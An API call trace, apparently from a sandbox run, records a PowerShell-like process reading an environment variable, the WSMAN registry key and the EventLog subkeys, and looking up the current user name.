	[0040.552] GetLastError () returned 0xcb
	[0040.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.553] GetLastError () returned 0xcb
	[0040.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.554] GetLastError () returned 0xcb
	[0040.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.563] GetLastError () returned 0xcb
	[0040.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.564] GetLastError () returned 0xcb
	[0040.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.566] GetLastError () returned 0xcb
	[0040.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e47c | out: phkResult=0x25e47c*=0x300) returned 0x0
	[0040.573] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e4d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e4cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e4d0*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.575] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x190b58, lpcchValueName=0x25e4f4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25e4f4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0040.575] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x190b58, lpcchValueName=0x25e4f4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25e4f4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0040.575] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x190b58, lpcchValueName=0x25e4f4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x25e4f4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0040.575] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e4d4, lpData=0x0, lpcbData=0x25e4d0*=0x0 | out: lpType=0x25e4d4*=0x1, lpData=0x0, lpcbData=0x25e4d0*=0x8) returned 0x0
	[0040.575] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e4d4, lpData=0x190b58, lpcbData=0x25e4d0*=0x8 | out: lpType=0x25e4d4*=0x1, lpData="2.0", lpcbData=0x25e4d0*=0x8) returned 0x0
	[0040.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e438 | out: phkResult=0x25e438*=0x304) returned 0x0
	[0040.643] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e488, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e48c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e488*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e48c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.643] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x190b58, lpcchValueName=0x25e4b0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25e4b0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0040.643] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x190b58, lpcchValueName=0x25e4b0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25e4b0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0040.643] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x190b58, lpcchValueName=0x25e4b0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x25e4b0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0040.643] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e490, lpData=0x0, lpcbData=0x25e48c*=0x0 | out: lpType=0x25e490*=0x1, lpData=0x0, lpcbData=0x25e48c*=0x8) returned 0x0
	[0040.643] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e490, lpData=0x190b58, lpcbData=0x25e48c*=0x8 | out: lpType=0x25e490*=0x1, lpData="2.0", lpcbData=0x25e48c*=0x8) returned 0x0
	[0040.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.644] GetLastError () returned 0xcb
	[0040.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0040.646] GetLastError () returned 0xcb
	[0040.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3f8 | out: phkResult=0x25e3f8*=0x308) returned 0x0
	[0040.649] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e460, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e45c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e460*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e45c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.650] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.650] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.650] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.650] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.651] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.651] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.651] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.651] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.651] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x190b58, lpcchName=0x25e47c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e47c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.651] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x324) returned 0x0
	[0040.651] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x2
	[0040.652] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x334) returned 0x0
	[0040.652] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x2
	[0040.652] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x338) returned 0x0
	[0040.652] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x2
	[0040.652] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x33c) returned 0x0
	[0040.653] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x2
	[0040.653] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x340) returned 0x0
	[0040.653] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x2
	[0040.653] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x344) returned 0x0
	[0040.653] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x2
	[0040.653] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x5
	[0040.714] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x348) returned 0x0
	[0040.714] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x0) returned 0x2
	[0040.715] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x34c) returned 0x0
	[0040.715] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e428 | out: phkResult=0x25e428*=0x350) returned 0x0
	[0040.715] RegCloseKey (hKey=0x350) returned 0x0
	[0040.715] RegCloseKey (hKey=0x308) returned 0x0
	[0040.716] RegCloseKey (hKey=0x34c) returned 0x0
	[0040.729] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x191318, nSize=0x25e574 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x25e574) returned 0x1
	[0040.733] GetLastError () returned 0x3
	[0040.734] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e57c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e57c) returned 1
	[0040.787] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3dc | out: phkResult=0x25e3dc*=0x354) returned 0x0
	[0040.788] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e444, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e440, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e444*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e440*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.788] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.788] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.788] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.788] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.788] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.789] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.789] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.789] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.789] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.789] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x358) returned 0x0
	[0040.789] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.790] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x35c) returned 0x0
	[0040.790] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.790] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x360) returned 0x0
	[0040.790] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.790] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x364) returned 0x0
	[0040.790] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.790] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x368) returned 0x0
	[0040.791] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.791] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x36c) returned 0x0
	[0040.791] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.791] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x5
	[0040.793] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x370) returned 0x0
	[0040.793] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.794] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x374) returned 0x0
	[0040.794] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x378) returned 0x0
	[0040.794] RegCloseKey (hKey=0x378) returned 0x0
	[0040.794] RegCloseKey (hKey=0x354) returned 0x0
	[0040.794] RegCloseKey (hKey=0x374) returned 0x0
	[0040.794] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3dc | out: phkResult=0x25e3dc*=0x374) returned 0x0
	[0040.795] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e444, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e440, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e444*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e440*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.795] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.795] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.795] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.796] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.796] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.796] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.796] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.796] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.796] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x190b58, lpcchName=0x25e460, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e460, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0040.797] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x354) returned 0x0
	[0040.797] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.797] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x378) returned 0x0
	[0040.797] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.797] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x37c) returned 0x0
	[0040.797] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.798] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x380) returned 0x0
	[0040.798] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.798] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x384) returned 0x0
	[0040.798] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.799] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x388) returned 0x0
	[0040.799] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.799] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x5
	[0040.802] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x38c) returned 0x0
	[0040.802] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x0) returned 0x2
	[0040.802] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x390) returned 0x0
	[0040.802] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x394) returned 0x0
	[0040.802] RegCloseKey (hKey=0x394) returned 0x0
	[0040.802] RegCloseKey (hKey=0x374) returned 0x0
	[0040.803] RegCloseKey (hKey=0x390) returned 0x0
	[0040.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3d0 | out: phkResult=0x25e3d0*=0x390) returned 0x0
